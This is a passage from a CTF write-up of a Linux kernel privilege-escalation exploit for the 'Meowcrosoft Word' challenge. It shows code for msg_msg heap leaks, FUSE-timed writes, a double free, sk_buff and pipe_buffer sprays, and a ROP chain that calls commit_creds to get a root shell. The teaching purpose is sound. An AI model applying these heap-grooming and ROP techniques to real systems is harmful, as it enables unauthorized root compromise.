At offset 0x18, corresponding to m_ts, we have overwritten the original size of the msg_msg object (which was 0x100) with 0x960. Now, we can start leaking data via msg_msg. We first want to find out which of the msg_msg objects was corrupted, and I did that by reading from each of the msg_msg objects using the MSG_COPY option, which allows me to read from the objects without freeing them. The m_type of the primary msg_msg objects in the spray were all set to 0x41; if there is an object where m_type is not 0x41, that is our target corrupted object.

    printf("[+] Finding corrupted message\n");
    for (int i = 0; i < NUM_MSQIDS; i++) {
        if (msgrcv(msqid[i], &message_leak, sizeof(message_leak) - sizeof(long), 0, MSG_COPY | IPC_NOWAIT) < 0) {
            perror("[!] msgrcv failed");
            exit(-1);
        }
        if (*(int *)&message_leak.mtype != 0x41) {
            corrupted_idx = i;
            break;
        }
    }
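To see why the m_type check works, it helps to lay the 0x20 bytes of the first write over a msg_msg header. The sketch below uses a stand-in header struct (x86-64 layout assumed, names made up) and applies the same four qwords as write1. Note that the write also clobbers m_list.next and m_list.prev with 0x4242..., which is presumably why the second write later has to put real pointers back before the message is touched by anything other than MSG_COPY.

```c
#include <stdint.h>
#include <string.h>

/* Stand-in for the kernel's struct msg_msg header on x86-64. */
struct list_head_model {
    uint64_t next;
    uint64_t prev;
};

struct msg_msg_model {
    struct list_head_model m_list; /* offset 0x00 */
    uint64_t m_type;               /* offset 0x10 */
    uint64_t m_ts;                 /* offset 0x18 */
    uint64_t next;                 /* offset 0x20, untouched by write1 */
    uint64_t security;             /* offset 0x28, untouched by write1 */
};

/* Apply the 0x20-byte first write to a header and return the result. */
struct msg_msg_model apply_write1(struct msg_msg_model hdr) {
    const uint64_t write1[4] = {
        0x4242424242424242ULL, /* m_list.next */
        0x4242424242424242ULL, /* m_list.prev */
        0x4343434343434343ULL, /* m_type: no longer 0x41 */
        0x960,                 /* m_ts: inflated size */
    };
    memcpy(&hdr, write1, sizeof(write1));
    return hdr;
}
```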

I was then able to leak a huge number of bytes (greater than the original 0x100) from the corrupted msg_msg object, which thinks that its size is 0x960. From there, I leaked the next pointer of the next message (which points to a kmalloc-cg-1024 heap address, which will be our target for spraying pipe buffer objects), as well as another set of next and prev pointers which will be used later in the exploit. Here is the current state of the system (prev pointers not shown for simplicity):

Diagram1
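Picking the interesting values out of the over-read can be sketched as below. This is not the parsing code from the exploit, and it leans on assumptions: the slot directly after the corrupted message is another primary message from the spray, each primary message occupies exactly slot_size bytes (0x100 here), and the spray stored a tag and the queue index in the first 8 bytes of mtext, as the spray loop above does. All names are made up for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define MSG_HDR_SIZE 0x30 /* sizeof(struct msg_msg) on x86-64 */

struct neighbor_leak {
    uint64_t next;   /* m_list.next: the neighbor's secondary message */
    uint64_t prev;   /* m_list.prev */
    uint64_t m_type;
    uint64_t m_ts;
    uint32_t tag;    /* first 4 bytes of the neighbor's mtext */
    uint32_t idx;    /* queue index written by the spray loop */
};

/* mtext/len: data returned by the MSG_COPY read of the corrupted message.
 * Returns 0 on success, -1 if the buffer is too short to hold a neighbor. */
int parse_neighbor(const unsigned char *mtext, size_t len,
                   size_t slot_size, struct neighbor_leak *out) {
    size_t hdr;
    if (slot_size < MSG_HDR_SIZE || len < slot_size + 8)
        return -1;
    /* Our own data ends where the next slot's header begins. */
    hdr = slot_size - MSG_HDR_SIZE;
    memcpy(&out->next,   mtext + hdr + 0x00, 8);
    memcpy(&out->prev,   mtext + hdr + 0x08, 8);
    memcpy(&out->m_type, mtext + hdr + 0x10, 8);
    memcpy(&out->m_ts,   mtext + hdr + 0x18, 8);
    /* The neighbor's mtext follows its 0x30-byte header. */
    memcpy(&out->tag, mtext + slot_size, 4);
    memcpy(&out->idx, mtext + slot_size + 4, 4);
    return 0;
}
```

Checking that m_type is 0x41 and that the tag matches before trusting the pointers is a cheap way to catch a neighbor slot that holds something else.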

So remember when I said that the cross cache was the intended solution? Later on in the CTF, someone remarked that they did not have to spray a lot of msg_msg objects to reclaim the freed document data region. So, I went to check the challenge again, and the kmalloc-cg caches seem to be missing from /proc/slabinfo or /sys/kernel/slab 0.0 I am currently not sure why this is the case, though I suspect it may have something to do with cache aliasing, but I may update this blog post or write another one when I find out why. If anyone knows why, please let me know!

UPDATE

So I found out why this was happening! Being a noob, I forgot to set CONFIG_MEMCG=y, which basically caused the cg caches to not exist. Whoops (skill issue moment). For more about CONFIG_MEMCG, check this out: https://cateee.net/lkddb/web-lkddb/MEMCG.html

Getting a Double Free

So here is how we are going to get a double free. We are going to first overwrite the next and prev pointers of the corrupted primary msg_msg object with the leaked next and prev pointers by unblocking /write2. We are then going to free the secondary message belonging to the primary msg_msg whose next and prev pointers we leaked. Note that when freeing the secondary messages, they are located via the next pointer. If we wanted to instantly get the double free, we could free the secondary message which the next pointer of the corrupted primary msg_msg object is pointing to (which would be the already freed secondary message), but to not cause crashes, we will spray a fake secondary msg_msg of size 1024 over the freed area, and then free the second time (which is why we needed another set of next/prev pointers because they would be the next/prev pointers of the fake secondary message). After freeing for the second time, we will spray pipe_buffer over the freed region of size 1024, and get to controlling RIP!

Let’s first talk about overwriting the next/prev pointer of the corrupted primary msg_msg object. We would do this with the next/prev pointers that we have leaked, but remember that previously, I mentioned that the contents of a FUSE file are “fixed” once the filesystem has been started in the setup phase. But fret not, there is a very cursed way of getting around this.

Remember how we used pipes to block and unblock FUSE? Turns out, we can also use the pipes to send and receive data (which is what pipes are for). When a read from the FUSE file /write2 is performed, the FUSE read handler tries to read from a pipe (via read(fuse_write2_data[0], &lolText, 0x18);), which blocks. Then, once our leaks are done, we write the data that should overwrite next/prev in the corrupted msg_msg into the pipe.

    // Build fuse_write2_data 
    memset(buf, 0, sizeof(buf)); 
    ((unsigned long *)buf)[0] = heap_addr;
    ((unsigned long *)buf)[1] = heap_prev;
    ((unsigned long *)buf)[2] = 0x41;
    write(fuse_write2_data[1], &buf, 0x18);

That way, when the read from the pipe completes, and FUSE unblocks, it can use that data as the contents of the FUSE file, which will then be used to perform the write.
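The pipe trick can be sketched in isolation like this. It is only an illustration: read_full and send_overwrite are hypothetical names, not functions from the exploit, and the real FUSE read handler does more than this. The point is that the reader blocks until the 0x18-byte payload (next, prev, m_type) shows up.

```c
#include <assert.h>
#include <errno.h>
#include <stdint.h>
#include <unistd.h>

/*
 * Hypothetical helper: block until exactly len bytes have arrived on fd.
 * Returns 0 on success, -1 on error or if the writer closed the pipe early.
 */
int read_full(int fd, void *dst, size_t len)
{
    uint8_t *p = dst;

    assert(dst != NULL);
    while (len > 0) {
        ssize_t n = read(fd, p, len);
        if (n < 0 && errno == EINTR)
            continue;           /* interrupted by a signal, retry */
        if (n <= 0)
            return -1;
        p += n;
        len -= (size_t)n;
    }
    return 0;
}

/*
 * Hypothetical helper: push the three qwords that will overwrite the
 * start of the corrupted msg_msg (m_list.next, m_list.prev, m_type).
 */
int send_overwrite(int wfd, uint64_t next, uint64_t prev, uint64_t mtype)
{
    uint64_t payload[3] = { next, prev, mtype };
    ssize_t n = write(wfd, payload, sizeof(payload));

    return n == (ssize_t)sizeof(payload) ? 0 : -1;
}
```

In the exploit the reading side sits inside the FUSE handler thread and the writing side runs in the main thread after the leak, so the handler stays parked in read() until the payload is known.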

At this point, this is the state of the system:

Diagram2

We are then going to free the secondary message belonging to the next primary msg_msg.

    // Free the next_idx secondary msg_msg first
    printf("[+] Freeing the next_idx secondary msg_msg\n");
    if (msgrcv(msqid[next_idx], &msg_secondary, sizeof(msg_secondary)-sizeof(long), 0x42, 0) < 0) {
        perror("[!] Free next_idx secondary msg_msg failed");
        exit(-1);
    }
    sleep(1);

The system now looks like this:

Diagram3

Then, we are going to spray a fake secondary msg_msg object via sk_buff. Note that I have set the security pointer to 0. I had to explicitly disable SELinux in the kernel config for this to work; otherwise there would be a NULL pointer dereference, and everything would explode. Theoretically we could leak a security pointer when we leak all the other stuff and use that as the security pointer, but I was lazy (whoops).

    printf("[+] Spraying sk_buff objects\n");
    memset(secondary_buf, 0, sizeof(secondary_buf));
    build_msg_msg((void *)secondary_buf, kheap_pt1, kheap_pt2, 1024 - MSG_MSG_SIZE, 0);
    for (int i = 0; i < NUM_SOCKETS; i++) {
        for (int j = 0; j < NUM_SKBUFFS; j++) {
            if (write(ss[i][0], secondary_buf, sizeof(secondary_buf)) < 0) {
                perror("[!] write");
                exit(-1);
            }
        }
    }
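For reference, here is a rough sketch of what a helper like build_msg_msg has to fill in. This is not the helper from the exploit: the name build_fake_msg_msg, the explicit m_type parameter, and the struct name are assumptions for illustration. The field order follows the kernel's struct msg_msg header on x86-64, which is 0x30 bytes.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define MSG_MSG_SIZE 0x30 /* assumed sizeof(struct msg_msg) on x86-64 */

/* Userspace mirror of the kernel's msg_msg header (illustrative name). */
struct fake_msg_msg {
    uint64_t m_list_next; /* next message in the queue */
    uint64_t m_list_prev; /* previous message in the queue */
    uint64_t m_type;      /* must match the type passed to msgrcv() */
    uint64_t m_ts;        /* message text size */
    uint64_t next;        /* msg_msgseg pointer, 0 if the text fits inline */
    uint64_t security;    /* left as 0, hence SELinux being disabled */
};

/* Hypothetical helper: write a fake header at the start of buf. */
void build_fake_msg_msg(void *buf, uint64_t list_next, uint64_t list_prev,
                        uint64_t m_type, uint64_t m_ts, uint64_t seg_next)
{
    struct fake_msg_msg hdr;

    assert(buf != NULL);
    memset(&hdr, 0, sizeof(hdr));
    hdr.m_list_next = list_next;
    hdr.m_list_prev = list_prev;
    hdr.m_type = m_type;
    hdr.m_ts = m_ts;
    hdr.next = seg_next;
    hdr.security = 0;
    memcpy(buf, &hdr, sizeof(hdr));
}
```

The list pointers have to be valid because msgrcv unlinks the message from the queue before freeing it, which is why the second set of leaked next/prev pointers goes here.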

The system after the spray:

Diagram4

After that, we are going to free the fake secondary msg_msg by freeing the secondary message of the corrupted msg_msg object.

    // Free the secondary message of corrupted_idx
    printf("[+] Freeing the corrupted_idx secondary msg_msg\n");
    if (msgrcv(msqid[corrupted_idx], &msg_secondary, sizeof(msg_secondary)-sizeof(long), 0x42, 0) < 0) {
        perror("[!] Free fake msg_msg object failed");
        exit(-1);
    }
    sleep(1);

The system now, with sk_buff pointing to the freed region:

Diagram5
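The reason the sk_buff still points at the region is that the kernel keeps the written bytes in a heap buffer until someone reads them back out of the socket. Below is a userspace-only sketch of that spray/release primitive. The helper names are made up, and the 0x140 bytes reserved for skb_shared_info is an assumption borrowed from public exploits for similar kernels, so check it against your target.

```c
#include <assert.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Assumption: skb_shared_info trails the payload in the same allocation. */
#define SKB_SHARED_INFO_SIZE 0x140
#define SPRAY_PAYLOAD (1024 - SKB_SHARED_INFO_SIZE)

/* Hypothetical helper: queue one payload, which allocates the skb data. */
int spray_one(int wfd, const void *payload)
{
    assert(payload != NULL);
    return write(wfd, payload, SPRAY_PAYLOAD) == (ssize_t)SPRAY_PAYLOAD ? 0 : -1;
}

/* Hypothetical helper: read the payload back, which frees the skb data. */
int release_one(int rfd, void *out)
{
    assert(out != NULL);
    return read(rfd, out, SPRAY_PAYLOAD) == (ssize_t)SPRAY_PAYLOAD ? 0 : -1;
}
```

Each socketpair(AF_UNIX, SOCK_STREAM, 0, ...) gives one write end and one read end, and the payload stays allocated in the kernel between spray_one and release_one.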

At this point, we can spray pipe_buffer objects over the freed 1024-byte region, and then free the sk_buff data that still overlaps it:

    printf("[+] Spraying pipe_buf over freed 1024 area\n");
    for (int i = 0; i < NUM_PIPEFDS; i++) {
        if (pipe(pipefd[i]) < 0) {
            perror("[!] pipe");
            exit(-1);
        }
        if (write(pipefd[i][1], "ABC", 3) < 0) {
            perror("[!] write");
            exit(-1);
        }
    } 
    
    // Free the overlapping pipe_buffer objects by reading the sk_buff data back out of the sockets
    printf("[+] Freeing pipe_buffer objects\n");
    for (int i = 0; i < NUM_SOCKETS; i++) {
        for (int j = 0; j < NUM_SKBUFFS; j++) {
            if (read(ss[i][1], secondary_buf, sizeof(secondary_buf)) < 0) {
                perror("[!] read");
                exit(-1);
            }
        }
    }

Note that pipe buffer is allocated in kmalloc-cg-1024.
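The size works out as follows. This is a back-of-the-envelope sketch that assumes the x86-64 layout of struct pipe_buffer (40 bytes) and the default of 16 buffers per pipe; the struct and function names are illustrative, and kmalloc_bucket only models the general-purpose kmalloc size classes.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define PIPE_DEF_BUFFERS 16 /* default ring size of a new pipe */

/* Userspace mirror of struct pipe_buffer on x86-64 (assumed layout). */
struct pipe_buffer_mirror {
    uint64_t page;    /* struct page * */
    uint32_t offset;
    uint32_t len;
    uint64_t ops;     /* const struct pipe_buf_operations *, at 0x10 */
    uint32_t flags;
    uint64_t private_data;
};

/* Bytes requested for the pipe_buffer array of a fresh pipe. */
size_t pipe_ring_bytes(void)
{
    return PIPE_DEF_BUFFERS * sizeof(struct pipe_buffer_mirror);
}

/* Smallest kmalloc size class that fits the request (8 bytes to 8 KiB). */
size_t kmalloc_bucket(size_t size)
{
    size_t bucket = 8;

    assert(size > 0 && size <= 8192);
    if (size > 64 && size <= 96)
        return 96;
    if (size > 128 && size <= 192)
        return 192;
    while (bucket < size)
        bucket <<= 1;
    return bucket;
}
```

With those assumptions, 16 * 40 = 640 bytes, which rounds up to the 1024 size class and is why the 1024-byte secondary message slot is the right target.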

ROP Time!!!

It is finally time to control RIP! We are going to make a fake pipe_buffer object with a fake pipe_buf_operations, where ops->release points to our first ROP gadget. Then, we are going to spray this fake pipe buffer object via sk_buff. To control RIP, all we need to do is to release the pipe buffer objects by closing the pipes.

Another way to control RIP would be to spray seq_operations instead (the initial document data object size would need to be 32 in that case) and overwrite one of the function pointers, which someone did in the CTF.

    memset(secondary_buf, 0, sizeof(secondary_buf));
    pbuf = (struct pipe_buffer *)&secondary_buf;
    pbuf->ops = heap_addr + 0x290;
    ops = (struct pipe_buf_operations *)&secondary_buf[0x290];
    ops->release = kernel_base + 0x60ecea; // 0xffffffff8160ecea : push rsi ; jmp qword ptr [rsi + 0x39]
    
    uint64_t *rop;
    rop = (uint64_t *)&secondary_buf[0x39];
    *rop = kernel_base + 0x02ba00; // 0xffffffff8102ba00 : pop rsp ; ret
    
    rop = (uint64_t *)&secondary_buf[0x0];
    *rop = 0xdeadbeefcafebabe;
    *rop++ = kernel_base + 0x4cf160; // ret 0x100;
    *rop++ = kernel_base + 0x426; // ret
    
    rop = (uint64_t *)&secondary_buf[0x178];
    *rop = kernel_base + 0x6615f; // pop rdi ; pop 5 ; ret
    *rop++ = kernel_base + 0x6615f; // pop rdi ; pop 5 ; ret
    
    rop = (uint64_t *)&secondary_buf[0x110];
    *rop = 0x4141414142424242;
    *rop++ = kernel_base + 0x6615f; // pop rdi ; pop 5 ; ret
    *rop++ = kernel_base + 0x1a0c900; // init_task
    *rop++ = 0x4141414141414141;
    *rop++ = 0x4141414141414141;
    *rop++ = 0x4141414141414141;
    *rop++ = 0x4141414141414141;
    *rop++ = 0x4141414141414141;
    *rop++ = kernel_base + 0x0ba280; // prepare_kernel_cred 
    *rop++ = kernel_base + 0x034df3; // pop rcx ; ret
    *rop++ = heap_addr + 0x178; 
    *rop++ = kernel_base + 0x3c72a7; // push rax ; jmp qword ptr [rcx]
    *rop++ = 0x4141414141414141;
    *rop++ = 0x4242424242424242;
    rop++; // skip 0x178: keep the pop rdi ; pop 5 ; ret gadget that push rax ; jmp qword ptr [rcx] jumps to
    *rop++ = 0x4444444444444444;
    *rop++ = 0x4545454545454545;
    *rop++ = kernel_base + 0x0b9ff0; // commit_creds
    *rop++ = kernel_base + 0xe97d68; // swapgs
    *rop++ = kernel_base + 0x037bc3; // iretq
    *rop++ = user_rip;
    *rop++ = user_cs; 
    *rop++ = user_rflags;
    *rop++ = user_sp;
    *rop++ = user_ss; 
    
    signal(SIGSEGV, get_shell);
    
    // Spray pipe_buf objects
    printf("[+] Spraying fake pipe_buffer objects\n");
    for (int i = 0; i < NUM_SOCKETS; i++) {
        for (int j = 0; j < NUM_SKBUFFS; j++) {
            if (write(ss[i][0], secondary_buf, sizeof(secondary_buf)) < 0) {
                perror("[!] write");
                exit(-1);
            }
        }
    }
    
    printf("[+] Releasing pipe_buffer objects\n");
    for (int i = 0; i < NUM_PIPEFDS; i++) {
        if (close(pipefd[i][0]) < 0) {
            perror("[!] close");
            exit(-1);
        }
        if (close(pipefd[i][1]) < 0) {
            perror("[!] close");
            exit(-1);
        }
    }
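The offsets in the chain (0x0, 0x39, 0x110, 0x178) look arbitrary, so here is a small sketch that walks the stack pointer through the gadgets. It is pure arithmetic with no kernel interaction, the function names are made up, and every offset is relative to the start of the fake pipe_buffer (heap_addr).

```c
#include <assert.h>
#include <stdint.h>

enum { SLOT = 8 }; /* one stack slot on x86-64 */

/* ret: pops one return address. */
uint64_t do_ret(uint64_t rsp) { return rsp + SLOT; }
/* ret imm16: pops the return address, then skips imm more bytes. */
uint64_t do_ret_imm(uint64_t rsp, uint64_t imm) { return rsp + SLOT + imm; }
/* n consecutive pop instructions. */
uint64_t do_pops(uint64_t rsp, unsigned n) { return rsp + (uint64_t)n * SLOT; }
/* push: moves the stack pointer down by one slot. */
uint64_t do_push(uint64_t rsp) { return rsp - SLOT; }

/* Offset of the first real chain entry, reached after the stack pivot. */
uint64_t chain_start_offset(void)
{
    uint64_t rsp = 0;              /* pop rsp loads heap_addr + 0x0 */
    rsp = do_ret(rsp);             /* jumps to [0x0], the ret 0x100 gadget */
    rsp = do_ret_imm(rsp, 0x100);  /* jumps to [0x8], the plain ret gadget */
    return rsp;                    /* that ret pops this slot next */
}

/* Offset of the slot that must hold the address of commit_creds. */
uint64_t commit_creds_slot(void)
{
    uint64_t rsp = chain_start_offset();
    rsp = do_ret(rsp);      /* into pop rdi ; pop 5 ; ret */
    rsp = do_pops(rsp, 6);  /* rdi = init_task, then five junk slots */
    rsp = do_ret(rsp);      /* into prepare_kernel_cred */
    rsp = do_ret(rsp);      /* it returns into pop rcx ; ret */
    rsp = do_pops(rsp, 1);  /* rcx = heap_addr + 0x178 */
    rsp = do_ret(rsp);      /* into push rax ; jmp qword ptr [rcx] */
    rsp = do_push(rsp);     /* the new cred pointer lands on the stack */
    rsp = do_pops(rsp, 6);  /* rdi = cred, five slots skipped incl. 0x178 */
    return rsp;             /* the final ret of the gadget pops this slot */
}
```

So ret 0x100 exists to hop over the ops pointer at 0x10 and the gadget pointer at 0x39, and the chain proper starts at 0x110. The slot at 0x178 is one of the five skipped by the second pop rdi ; pop 5 ; ret, which is why it can hold the gadget address that rcx points to.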

Note that instead of calling the classic prepare_kernel_cred(0), you now need to call prepare_kernel_cred(&init_task), since newer kernels no longer treat a NULL argument as a request for the init credentials. This is due to https://lore.kernel.org/lkml/Y1q53XlLE2n9yGH7@bombadil.infradead.org/T/.

Now, all that is left to do is to enjoy your shell :3333

Output of exploit:

STAGE 1: SETUP
[+] Initial setup
[+] Setting up pipes
[+] Making FUSE directory /tmp/fuse_dir
[+] Starting FUSE filesystem
[+] Opening FUSE file write1
[+] Opening FUSE file write2
[+] Setting up sockets
[+] Setting up msg queues
[+] Opening Meowcrosoft Word device
STAGE 2: KERNEL TEXT AND HEAP LEAKS
[+] Created new doc
[+] Creating thread for write2
--> Trying to read /write2, 0, 4096
[+] Blocking FUSE read thread
[+] Entering write2 thread
[+] Creating thread for write1
[+] Entered write1 thread
[+] Performed free
[+] Spraying timerfd
--> Trying to read /write1, 0, 4096
[+] Blocking FUSE read thread
[+] Performed read
[+] Kernel text leak: ffffffffa72e91e0
[+] Kernel text base: ffffffffa7000000
[+] Freeing timerfd spray
[+] Spraying primary msg_msg objects
[+] Spraying secondary msg_msg objects
[+] Unblocked FUSE read thread
[+] Finished write1 thread
[+] Performed write
[+] Finding corrupted message
[+] Leaked primary msg_msg contents
[+] kheap 1024 address: ffff9d47044fc400
[+] msg_msg prev address: ffff9d47044963c0
[+] corrupted msg_msg idx: 24
[+] next msg_msg idx: 28
[+] kheap pt1: ffff9d47044ff800
[+] kheap pt2: ffff9d470470a7c0
[+] Finished write2 thread
[*] From FUSE: ffff9d47044fc400
[*] From FUSE: ffff9d47044963c0
[*] From FUSE: 41
[+] Unblocked FUSE read thread
[+] Performed write
STAGE 3: ROP TIME
[+] Freeing the next_idx secondary msg_msg
[+] Spraying sk_buff objects
[+] Freeing the corrupted_idx secondary msg_msg
[+] Spraying pipe_buf over freed 1024 area
[+] Freeing pipe_buffer objects
[+] Saved state
[+] Spraying fake pipe_buffer objects
[+] Releasing pipe_buffer objects
[+] Returned to userland
[+] UID: 0, got root!
# :333333 YAY SHELLZ

Hope that yall had fun with the challenge and thanks for reading this! :3

You can get the challenge files here: https://github.com/KaligulaArmblessed/CTF-Challenges/tree/main/Meowcrosoft_Word

The full exploit can be obtained here: https://github.com/KaligulaArmblessed/CTF-Challenges/blob/main/Meowcrosoft_Word/exploit.c

Special thanks to HITCON and Billy for inspiration, STAR Labs for the idea, and everyone for playing :D

Meowcrosoft Word [STANDCON 2023] - Mon, Dec 11, 2023